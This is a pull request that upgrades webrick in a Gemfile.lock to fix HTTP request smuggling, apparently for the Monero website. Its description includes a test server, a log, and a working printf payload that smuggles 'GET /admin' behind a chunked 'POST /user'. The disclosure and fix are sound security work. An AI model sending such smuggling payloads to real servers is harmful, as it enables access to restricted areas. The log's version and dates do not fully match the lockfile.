### PR TITLE
fix HTTP Request Smuggling `monero-site` used webrick

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -66,7 +66,7 @@ GEM
     terminal-table (3.0.2)
       unicode-display_width (>= 1.1.1, < 3)
     unicode-display_width (2.3.0)
-    webrick (1.7.0)
+    webrick (1.8.2)
 
 PLATFORMS
   ruby


### PR DESCRIPTION
## Descriptions 
The vulnerability happens because the server doesn't correctly handle requests with both Content-Length and Transfer-Encoding headers. This allows an attacker to sneak in an extra request (e.g., GET /admin) after the normal request (POST /user). As a result, unauthorized users can access restricted areas like /admin by POST /user.

The following monero used webrick sample server was used to process HTTP requests:
```
require 'webrick'
require 'monero-site'
server = WEBrick::HTTPServer.new(
  Port: 8000,
  DocumentRoot: Dir.pwd
)

server.mount_proc '/admin' do |req, res|
  res.body = "This is the admin area. Only authorized users should see this.\n"
end

server.mount_proc '/user' do |req, res|
  res.body = "This is the user area. Welcome!\n"
end

trap('INT') { server.shutdown }
server.start
```
Console log
```
pwnosec@academylabs:~/Work/monero/webrick$ ruby test.rb
[2024-10-15 00:20:45] INFO  WEBrick 1.8.1
[2024-10-15 00:20:45] INFO  ruby 3.0.2 (2021-07-07) [x86_64-linux-gnu]
[2024-10-15 00:20:45] INFO  WEBrick::HTTPServer#start: pid=209120 port=8000
127.0.0.1 - - [10/Oct/2024:00:20:46 CST] "POST /user HTTP/1.1" 200 32
- -> /user
127.0.0.1 - - [10/Oct/2024:00:20:46 CST] "GET /admin HTTP/1.1" 200 63
- -> /admin
```
```
(printf 'POST /user HTTP/1.1\r\nHost: getmonero.org:8000\r\nTransfer-Encoding: chunked\r\nContent-Length: 50\r\n\r\n0\r\n\r\nGET /admin HTTP/1.1\r\nHost: getmonero.org:8000\r\n\
r\n'; cat)
```
![image](https://github.com/user-attachments/assets/4adba5f1-13b3-4bae-81e8-1bd667d83383)
